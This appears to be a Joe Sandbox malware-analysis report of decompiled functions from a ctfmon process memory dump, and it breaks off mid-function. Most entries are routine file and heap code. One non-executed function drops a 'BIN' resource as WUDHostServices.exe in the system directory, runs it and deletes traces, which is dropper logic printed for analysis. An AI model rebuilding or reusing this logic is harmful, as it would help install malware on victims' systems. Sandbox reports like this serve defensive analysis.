                                                • LocalFree.KERNELBASE(00000000), ref: 00964912
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: ffeae2b735a774d263e91dd3e43b4183f2aec506a6ffad2c04c8ec60d4dc7ff3
                                                • Instruction ID: bc29fafdcdbe1647efc630914ae64523ee5791dba07e8abef59e9278458e4507
                                                • Opcode Fuzzy Hash: ffeae2b735a774d263e91dd3e43b4183f2aec506a6ffad2c04c8ec60d4dc7ff3
                                                • Instruction Fuzzy Hash: ED019231D14F45ABD3118F38CD41AB2F3B4FFAD318705A709EAC522912E761B5E49750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096E280 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0096E280(char* __ecx, long __edx) {
				void _v5;
				long _v12;
				signed int _t22;
				signed int* _t28;
				intOrPtr _t29;
				intOrPtr _t31;
				char* _t35;

				_t35 = __ecx;
				_t28 = __edx;
				_v12 = __edx;
				_t33 = 1;
				if( *__ecx == 0) {
					_t29 =  *((intOrPtr*)(__ecx + 0x1c));
					_t31 =  *((intOrPtr*)(__ecx + 0x18));
					if(_t29 + 1 > _t31) {
						_t33 = _t31 - _t29;
					}
					E00983DB0( &_v5,  *((intOrPtr*)(_t35 + 0x14)) + _t29, _t33);
					_t22 = _t29 + _t33;
					_t28 = _v12;
					 *(_t35 + 0x1c) = _t22;
				} else {
					_t22 = ReadFile( *(__ecx + 4),  &_v5, 1,  &_v12, 0); // executed
					if(_t22 == 0) {
						 *((char*)(_t35 + 8)) = 1;
					}
					_t33 = _v12;
				}
				if(_t33 != 1) {
					if( *_t35 == 0 ||  *((char*)(_t35 + 8)) == 0) {
						goto L9;
					} else {
						return _t22 | 0xffffffff;
					}
				} else {
					 *_t28 = _v5 & 0x000000ff;
					L9:
					return 0;
				}
			}










                                                0x0096e288
                                                0x0096e28a
                                                0x0096e28d
                                                0x0096e290
                                                0x0096e298
                                                0x0096e2bb
                                                0x0096e2be
                                                0x0096e2c6
                                                0x0096e2ca
                                                0x0096e2ca
                                                0x0096e2d7
                                                0x0096e2dc
                                                0x0096e2e2
                                                0x0096e2e5
                                                0x0096e29a
                                                0x0096e2a8
                                                0x0096e2b0
                                                0x0096e2b2
                                                0x0096e2b2
                                                0x0096e2b6
                                                0x0096e2b6
                                                0x0096e2eb
                                                0x0096e2ff
                                                0x00000000
                                                0x0096e309
                                                0x0096e310
                                                0x0096e310
                                                0x0096e2ed
                                                0x0096e2f1
                                                0x0096e2f5
                                                0x0096e2fb
                                                0x0096e2fb

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0096E59A,00000001), ref: 0096E2A8
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f4c88f9c63e02d4ecca992a78c9ecb281668231e3e99f89c4896102375a15950
                                                • Instruction ID: a2a9e000ea258f4bba6b0319a17ce728c6ff07f27d1fa21c4d914fe829cca493
                                                • Opcode Fuzzy Hash: f4c88f9c63e02d4ecca992a78c9ecb281668231e3e99f89c4896102375a15950
                                                • Instruction Fuzzy Hash: DF11EB79A042086FDB30CF99D8C4BA9BBFDEB85314F1405AED895C7281D671ED48C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096F3D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E0096F3D0(intOrPtr* __ecx, void* __edi, CHAR* _a4) {
				char _v8;
				char _t13;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				short _t21;
				CHAR* _t23;
				char* _t29;
				CHAR* _t32;
				short* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t36 = __ecx;
				if( *__ecx != 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					return 0x1000000;
				} else {
					_t2 = _t36 + 0x140; // 0x140
					_t32 = _t2;
					GetCurrentDirectoryA(0x104, _t32);
					_t23 = _t32;
					_t3 =  &(_t23[1]); // 0x141
					_t29 = _t3;
					do {
						_t13 =  *_t23;
						_t23 =  &(_t23[1]);
					} while (_t13 != 0);
					_t24 = _t23 - _t29;
					_t14 =  *((intOrPtr*)(_t23 - _t29 + _t36 + 0x13f));
					if(_t14 != 0x5c && _t14 != 0x2f) {
						_t34 = _t32 - 1;
						do {
							_t20 =  *((intOrPtr*)(_t34 + 1));
							_t34 = _t34 + 1;
						} while (_t20 != 0);
						_t21 = "\\"; // 0x5c
						 *_t34 = _t21;
					}
					_t16 = E0096E0D0(_a4, _t24,  &_v8); // executed
					if(_t16 != 0) {
						_t17 = E0096E550(_t16); // executed
						 *_t36 = _t17;
						_t28 =  ==  ? 0x200 : 0;
						_t18 =  ==  ? 0x200 : 0;
						return  ==  ? 0x200 : 0;
					} else {
						return _v8;
					}
				}
			}















                                                0x0096f3d3
                                                0x0096f3d5
                                                0x0096f3da
                                                0x0096f479
                                                0x0096f3ea
                                                0x0096f3eb
                                                0x0096f3eb
                                                0x0096f3f7
                                                0x0096f3fd
                                                0x0096f3ff
                                                0x0096f3ff
                                                0x0096f402
                                                0x0096f402
                                                0x0096f404
                                                0x0096f405
                                                0x0096f409
                                                0x0096f40b
                                                0x0096f414
                                                0x0096f41a
                                                0x0096f420
                                                0x0096f420
                                                0x0096f423
                                                0x0096f426
                                                0x0096f42a
                                                0x0096f430
                                                0x0096f430
                                                0x0096f43b
                                                0x0096f446
                                                0x0096f454
                                                0x0096f45b
                                                0x0096f465
                                                0x0096f468
                                                0x0096f46d
                                                0x0096f448
                                                0x0096f44f
                                                0x0096f44f
                                                0x0096f446

                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0096FFE1,?,?,00000244,35554C2F,?,?,?,35554C2F,009847B2), ref: 0096F3F7
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 4797bee67188648cda783eb7184714df6d2ad8c8b01b1dff129d9cbe5e9ba135
                                                • Instruction ID: 7ff38ed9a6baa83b541b76041b8b2d560c70dc6fdcd1f9a8285f93544b20c71a
                                                • Opcode Fuzzy Hash: 4797bee67188648cda783eb7184714df6d2ad8c8b01b1dff129d9cbe5e9ba135
                                                • Instruction Fuzzy Hash: 71113D361042059BCB248F2CB815BF6B799DF89314F00437EE89987A51EB325D578790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096E200 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0096E200(void* __ecx, signed int __edx, long _a4, char* _a8) {
				void* _v8;
				int _t26;
				signed int _t30;
				intOrPtr _t34;
				intOrPtr _t39;
				char* _t45;
				long _t50;

				_push(__ecx);
				_t45 = _a8;
				_t30 = __edx;
				_t50 = __edx * _a4;
				_v8 = __ecx;
				if( *_t45 == 0) {
					_t39 =  *((intOrPtr*)(_t45 + 0x1c));
					_t34 =  *((intOrPtr*)(_t45 + 0x18));
					if(_t39 + _t50 > _t34) {
						_t50 = _t34 - _t39;
					}
					E00983DB0(_v8,  *((intOrPtr*)(_t45 + 0x14)) + _t39, _t50);
					 *((intOrPtr*)(_t45 + 0x1c)) =  *((intOrPtr*)(_t45 + 0x1c)) + _t50;
					return _t50 / _t30;
				} else {
					_t26 = ReadFile( *(_t45 + 4), __ecx, _t50,  &_a4, 0); // executed
					if(_t26 == 0) {
						 *((char*)(_t45 + 8)) = 1;
					}
					return _a4 / _t30;
				}
			}










                                                0x0096e203
                                                0x0096e207
                                                0x0096e20a
                                                0x0096e210
                                                0x0096e214
                                                0x0096e21a
                                                0x0096e243
                                                0x0096e246
                                                0x0096e24e
                                                0x0096e252
                                                0x0096e252
                                                0x0096e25e
                                                0x0096e263
                                                0x0096e275
                                                0x0096e21c
                                                0x0096e227
                                                0x0096e22f
                                                0x0096e231
                                                0x0096e231
                                                0x0096e242
                                                0x0096e242

                                                APIs
                                                • ReadFile.KERNELBASE(000000FF,00000078,?,?,00000000,00000000,00000000,00000000,00000078,?,0096EC00,00000001,00000000), ref: 0096E227
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 03c02a71c80ea9bd677d81d57e93326f793ace6b4235d628875d96bed000b52a
                                                • Instruction ID: 9a2501da467ec71c74fb4018121b4ddee9289f6456c66c19f294038da491b2b8
                                                • Opcode Fuzzy Hash: 03c02a71c80ea9bd677d81d57e93326f793ace6b4235d628875d96bed000b52a
                                                • Instruction Fuzzy Hash: 9F01C475B000197FD718CE1ADC85AA6FB6DFF88324F04826AE80C87200E771AD64CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009778D0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E009778D0(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x9967f4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00977501();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00975D43())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00976248(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









                                                0x009778d0
                                                0x009778d6
                                                0x009778db
                                                0x009778e9
                                                0x009778e9
                                                0x009778ef
                                                0x009778f1
                                                0x009778f1
                                                0x00977908
                                                0x00977911
                                                0x00977919
                                                0x00000000
                                                0x00000000
                                                0x009778f9
                                                0x009778fb
                                                0x0097791d
                                                0x00977922
                                                0x00977928
                                                0x00000000
                                                0x00977928
                                                0x009778fe
                                                0x00977903
                                                0x00977904
                                                0x00977906
                                                0x00000000
                                                0x00000000
                                                0x00977906
                                                0x00000000
                                                0x00977908
                                                0x009778e1
                                                0x009778e7
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009791AD,00000001,00000364,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 00977911
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 70fa8f1da509dad9e6c10ddd2cc36616177805cc0c13607d57f09baabad4063b
                                                • Instruction ID: c7de5845d772363ec74bc1b2da38cf7a41088b73850da18abad7d372f83f12aa
                                                • Opcode Fuzzy Hash: 70fa8f1da509dad9e6c10ddd2cc36616177805cc0c13607d57f09baabad4063b
                                                • Instruction Fuzzy Hash: 45F0E93361E62967DB221BE6CC05F5AF74CEF81770B15C821BD0CD6191DA60DD10D6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00977882 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00977882(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00975D43())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x9967f4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00977501();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00976248(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                0x00977882
                                                0x00977888
                                                0x0097788e
                                                0x009778c0
                                                0x009778c5
                                                0x009778cb
                                                0x00000000
                                                0x009778cb
                                                0x00977892
                                                0x00977894
                                                0x00977894
                                                0x009778ab
                                                0x009778b4
                                                0x009778bc
                                                0x00000000
                                                0x00000000
                                                0x0097789c
                                                0x0097789e
                                                0x00000000
                                                0x00000000
                                                0x009778a1
                                                0x009778a6
                                                0x009778a7
                                                0x009778a9
                                                0x00000000
                                                0x00000000
                                                0x009778a9
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 75b820537c52b14bafb73759609dd39934703d0fa5a0f9d97e24928586b36b9a
                                                • Instruction ID: d364ff423e4dc294e360d18653bf04bc2742b117f80f8ce45c67dff446bbe811
                                                • Opcode Fuzzy Hash: 75b820537c52b14bafb73759609dd39934703d0fa5a0f9d97e24928586b36b9a
                                                • Instruction Fuzzy Hash: CFE06D3314C62566D62137E9DC49BDABB4CDB823E0F268161AC1DA6291DB64DC00C2E7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096E550 Relevance: 1.4, APIs: 1, Instructions: 199COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E0096E550(char* __ecx) {
				intOrPtr _v8;
				char _v96;
				char _v100;
				intOrPtr _v104;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				void _v132;
				long _v136;
				void* _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				long _t58;
				void* _t59;
				char _t61;
				char _t62;
				char _t63;
				void* _t67;
				void* _t68;
				char _t70;
				intOrPtr _t76;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t101;
				char _t112;
				intOrPtr _t136;
				void _t146;
				char _t157;
				void* _t158;
				intOrPtr _t160;

				_push(_t87);
				_t146 = __ecx;
				_t170 = __ecx;
				if(__ecx == 0) {
					L31:
					__eflags = 0;
					return 0;
				} else {
					_t58 = E0096E3C0(__ecx, _t170); // executed
					_t89 = _t87 | 0xffffffff;
					_v136 = _t58;
					_t155 =  ==  ? _t89 : 0; // executed
					_t59 = E0096E170(__ecx, _t58, 0); // executed
					_t156 =  !=  ? _t89 :  ==  ? _t89 : 0; // executed
					E0096E320(__ecx,  &_v140, _t59); // executed
					_t157 =  !=  ? _t89 :  !=  ? _t89 :  ==  ? _t89 : 0;
					_t61 = E0096E280(__ecx,  &_v152);
					_v144 = _v152;
					if(_t61 != 0) {
						L4:
						__eflags = _t61;
						_v144 = 0;
						_t157 =  !=  ? _t89 : _t157;
						__eflags = _t157;
					} else {
						_t61 = E0096E280(__ecx,  &_v152);
						if(_t61 != 0) {
							goto L4;
						} else {
							_t101 = _v152 << 8;
							_v144 = _v144 + _t101;
							_t89 = _t101 | 0xffffffff;
						}
					}
					_t62 = E0096E280(_t146,  &_v152);
					_v148 = _v152;
					if(_t62 != 0) {
						L8:
						__eflags = _t62;
						_v148 = 0;
						_t157 =  !=  ? _t89 : _t157;
						__eflags = _t157;
					} else {
						_t62 = E0096E280(_t146,  &_v152);
						if(_t62 != 0) {
							goto L8;
						} else {
							_v148 = _v148 + (_v152 << 8);
						}
					}
					_t63 = E0096E280(_t146,  &_v152);
					_v140 = _v152;
					if(_t63 != 0) {
						L12:
						_t90 = 0;
						__eflags = _t63;
						_t157 =  !=  ? 0xffffffff : _t157;
					} else {
						_t63 = E0096E280(_t146,  &_v152);
						if(_t63 != 0) {
							goto L12;
						} else {
							_t90 = (_v152 << 8) + _v140;
						}
					}
					_v128 = _t90;
					_t112 = E0096E280(_t146,  &_v152);
					_v140 = _v152;
					if(_t112 != 0) {
						L16:
						_t67 = 0;
						__eflags = _t112;
						_t158 =  !=  ? 0xffffffff : _t157;
					} else {
						_t112 = E0096E280(_t146,  &_v152);
						if(_t112 != 0) {
							goto L16;
						} else {
							_t67 = (_v152 << 8) + _v140;
						}
					}
					if(_t67 != _t90 || _v148 != 0) {
						L20:
						_t158 = 0xffffff99;
					} else {
						_t184 = _v144;
						if(_v144 != 0) {
							goto L20;
						}
					}
					_t68 = E0096E320(_t146,  &_v100, _t184);
					_t159 =  !=  ? 0xffffffff : _t158;
					E0096E320(_t146,  &_v96, _t68);
					_t160 =  !=  ? 0xffffffff :  !=  ? 0xffffffff : _t158;
					_t70 = E0096E280(_t146,  &_v152);
					_t92 = _v152;
					if(_t70 != 0) {
						L24:
						__eflags = _t70;
						_v124 = 0;
						_t160 =  !=  ? 0xffffffff : _t160;
					} else {
						_t70 = E0096E280(_t146,  &_v152);
						if(_t70 != 0) {
							goto L24;
						} else {
							_v124 = (_v152 << 8) + _t92;
						}
					}
					_t136 =  *((intOrPtr*)(_t146 + 0xc));
					_t118 = _v136 + _t136;
					_t93 = _v100;
					if(_v136 + _t136 < _v96 + _t93 || _t160 != 0) {
						__eflags =  *((char*)(_t146 + 0x10));
						if( *((char*)(_t146 + 0x10)) != 0) {
							CloseHandle( *(_t146 + 4));
						}
						_push(0x20);
						E00970AA1(_t146);
						goto L31;
					} else {
						_t76 = _v136;
						_v132 = _t146;
						_push(0x80);
						_v120 = _t136 - _t93 - _v96 + _t76;
						_v104 = _t76;
						_v8 = _t160;
						 *((intOrPtr*)(_t146 + 0xc)) = _t160;
						_t94 = E00975A3B(_t118);
						memcpy(_t94,  &_v132, 0x20 << 2);
						E0096EC60(_t94);
						return _t94;
					}
				}
			}






































                                                0x0096e55c
                                                0x0096e55f
                                                0x0096e561
                                                0x0096e563
                                                0x0096e7aa
                                                0x0096e7ac
                                                0x0096e7b2
                                                0x0096e569
                                                0x0096e56b
                                                0x0096e570
                                                0x0096e573
                                                0x0096e57f
                                                0x0096e582
                                                0x0096e592
                                                0x0096e595
                                                0x0096e5a2
                                                0x0096e5a5
                                                0x0096e5ae
                                                0x0096e5b4
                                                0x0096e5d5
                                                0x0096e5d5
                                                0x0096e5d7
                                                0x0096e5df
                                                0x0096e5df
                                                0x0096e5b6
                                                0x0096e5bc
                                                0x0096e5c3
                                                0x00000000
                                                0x0096e5c5
                                                0x0096e5c9
                                                0x0096e5cc
                                                0x0096e5d0
                                                0x0096e5d0
                                                0x0096e5c3
                                                0x0096e5e8
                                                0x0096e5f1
                                                0x0096e5f7
                                                0x0096e615
                                                0x0096e615
                                                0x0096e617
                                                0x0096e61f
                                                0x0096e61f
                                                0x0096e5f9
                                                0x0096e5ff
                                                0x0096e606
                                                0x00000000
                                                0x0096e608
                                                0x0096e60f
                                                0x0096e60f
                                                0x0096e606
                                                0x0096e628
                                                0x0096e631
                                                0x0096e637
                                                0x0096e655
                                                0x0096e655
                                                0x0096e657
                                                0x0096e65e
                                                0x0096e639
                                                0x0096e63f
                                                0x0096e646
                                                0x00000000
                                                0x0096e648
                                                0x0096e64f
                                                0x0096e64f
                                                0x0096e646
                                                0x0096e665
                                                0x0096e670
                                                0x0096e676
                                                0x0096e67c
                                                0x0096e69c
                                                0x0096e69c
                                                0x0096e69e
                                                0x0096e6a5
                                                0x0096e67e
                                                0x0096e689
                                                0x0096e68d
                                                0x00000000
                                                0x0096e68f
                                                0x0096e696
                                                0x0096e696
                                                0x0096e68d
                                                0x0096e6aa
                                                0x0096e6ba
                                                0x0096e6ba
                                                0x0096e6b3
                                                0x0096e6b3
                                                0x0096e6b8
                                                0x00000000
                                                0x00000000
                                                0x0096e6b8
                                                0x0096e6c5
                                                0x0096e6d7
                                                0x0096e6da
                                                0x0096e6e7
                                                0x0096e6ea
                                                0x0096e6ef
                                                0x0096e6f5
                                                0x0096e715
                                                0x0096e715
                                                0x0096e717
                                                0x0096e724
                                                0x0096e6f7
                                                0x0096e6fd
                                                0x0096e704
                                                0x00000000
                                                0x0096e706
                                                0x0096e70f
                                                0x0096e70f
                                                0x0096e704
                                                0x0096e72f
                                                0x0096e732
                                                0x0096e734
                                                0x0096e73c
                                                0x0096e790
                                                0x0096e794
                                                0x0096e799
                                                0x0096e799
                                                0x0096e79f
                                                0x0096e7a2
                                                0x00000000
                                                0x0096e742
                                                0x0096e742
                                                0x0096e74e
                                                0x0096e752
                                                0x0096e757
                                                0x0096e75b
                                                0x0096e75f
                                                0x0096e766
                                                0x0096e76e
                                                0x0096e77e
                                                0x0096e782
                                                0x0096e78f
                                                0x0096e78f
                                                0x0096e73c

                                                APIs
                                                  • Part of subcall function 0096E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E190
                                                  • Part of subcall function 0096E280: ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0096E59A,00000001), ref: 0096E2A8
                                                • CloseHandle.KERNEL32(?), ref: 0096E799
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseHandlePointerRead
                                                • String ID:
                                                • API String ID: 3130900363-0
                                                • Opcode ID: 84ad4ebc5f96a6d913115a4515a44eeb8209ab98c4e8258d5ca282e812de39f6
                                                • Instruction ID: be64c13af0e2f186b0af54aed64f1dd0034d676df8f0cdfbac5fab48cb5dc5bd
                                                • Opcode Fuzzy Hash: 84ad4ebc5f96a6d913115a4515a44eeb8209ab98c4e8258d5ca282e812de39f6
                                                • Instruction Fuzzy Hash: 76613B797093019FD715DE28C89072FB3E6AFD4364F048E2DE86987281FB74DD098A82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00969740 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 112filesynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E00969740(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				void* __esi;
				signed int _t22;
				void* _t51;
				struct HRSRC__* _t57;
				void* _t70;
				long _t71;
				void** _t72;
				signed int _t73;

				_t68 = __edi;
				_t58 = __ecx;
				_t22 =  *0x98f008; // 0x35554c2f
				_v8 = _t22 ^ _t73;
				_v792 = __edx;
				_v796 = __ecx;
				E00973440(__edi,  &_v788, 0, 0x104);
				E00973440(_t68,  &_v528, 0, 0x104);
				E00973440(_t68,  &_v268, 0, 0x104);
				GetSystemDirectoryA( &_v788, 0x104);
				E00963F90(_t58,  &_v528, "%s\\mkz.output",  &_v788);
				E00963F90(_t58,  &_v268, "%s\\WUDHostServices.exe",  &_v788);
				DeleteFileA( &_v528);
				DeleteFileA( &_v268);
				_t57 = FindResourceA(0, 0x65, "BIN");
				if(_t57 == 0) {
					L7:
					DeleteFileA( &_v268);
					DeleteFileA( &_v528);
					return E00970A5D(_v8 ^ _t73, _t70);
				}
				_push(_t70);
				_t71 = SizeofResource(0, _t57);
				if(LockResource(LoadResource(0, _t57)) != 0 && _t71 != 0) {
					_t51 = E00964E00( &_v268, _t50, _t71);
					_t83 = _t51;
					if(_t51 != 0) {
						_t72 = E00964F50( &_v268, 0, _t83, 0);
						if(_t72 != 0) {
							WaitForSingleObject( *_t72, 0x7530);
							_push(0x10);
							E00970AA1(_t72);
							E009694A0(_t57,  &_v528, _v796, DeleteFileA, _v792);
						}
					}
				}
				_pop(_t70);
				goto L7;
			}

















                                                0x00969740
                                                0x00969740
                                                0x00969749
                                                0x00969750
                                                0x00969760
                                                0x00969769
                                                0x0096976f
                                                0x00969782
                                                0x00969795
                                                0x009697a9
                                                0x009697c2
                                                0x009697da
                                                0x009697ef
                                                0x009697f8
                                                0x00969809
                                                0x0096980d
                                                0x00969894
                                                0x0096989b
                                                0x009698a4
                                                0x009698b5
                                                0x009698b5
                                                0x00969813
                                                0x00969820
                                                0x00969831
                                                0x00969840
                                                0x00969848
                                                0x0096984a
                                                0x0096985b
                                                0x00969862
                                                0x0096986b
                                                0x00969871
                                                0x00969874
                                                0x0096988b
                                                0x00969890
                                                0x00969862
                                                0x0096984a
                                                0x00969893
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 009697A9
                                                • DeleteFileA.KERNEL32(?), ref: 009697EF
                                                • DeleteFileA.KERNEL32(?), ref: 009697F8
                                                • FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 00969803
                                                • SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 00969817
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00969822
                                                • LockResource.KERNEL32(00000000), ref: 00969829
                                                  • Part of subcall function 00964E00: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,00969845), ref: 00964E22
                                                  • Part of subcall function 00964E00: WriteFile.KERNEL32(00000000,00000000,00969845,00000000,00000000,?,00969845), ref: 00964E39
                                                  • Part of subcall function 00964E00: CloseHandle.KERNEL32(00000000,?,00969845), ref: 00964E44
                                                  • Part of subcall function 00964F50: new.LIBCMT ref: 00964F6C
                                                  • Part of subcall function 00964F50: GetStartupInfoA.KERNEL32(?), ref: 00964F8D
                                                  • Part of subcall function 00964F50: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,0096985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 00964FBB
                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 0096986B
                                                • DeleteFileA.KERNEL32(?), ref: 0096989B
                                                • DeleteFileA.KERNEL32(?), ref: 009698A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$DeleteResource$Create$CloseDirectoryFindHandleInfoLoadLockObjectProcessSingleSizeofStartupSystemWaitWrite
                                                • String ID: %s\WUDHostServices.exe$%s\mkz.output$/LU5/$BIN
                                                • API String ID: 3567760449-3444193085
                                                • Opcode ID: 8866f364798aa7cded3d21711af2276211cc1b9d688dbccbb202df9f955dd1da
                                                • Instruction ID: 9eb5d47b4299e5edfab741c55322c4c288984e8c1d141ca6f1995d35ff9d12cd
                                                • Opcode Fuzzy Hash: 8866f364798aa7cded3d21711af2276211cc1b9d688dbccbb202df9f955dd1da
                                                • Instruction Fuzzy Hash: 233186B2D0431CABDB21EBA4DC4AFDA737CAB44704F0044E5B60DE7191DAB09F888B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00969D90 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 287COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E00969D90(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed char _v28;
				struct _CRITICAL_SECTION _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _v68;
				struct _CRITICAL_SECTION _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed char _v108;
				struct _CRITICAL_SECTION _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				signed char _v148;
				struct _CRITICAL_SECTION _v172;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				signed char _v188;
				struct _CRITICAL_SECTION _v212;
				char _v216;
				void* __ebx;
				void* __edi;
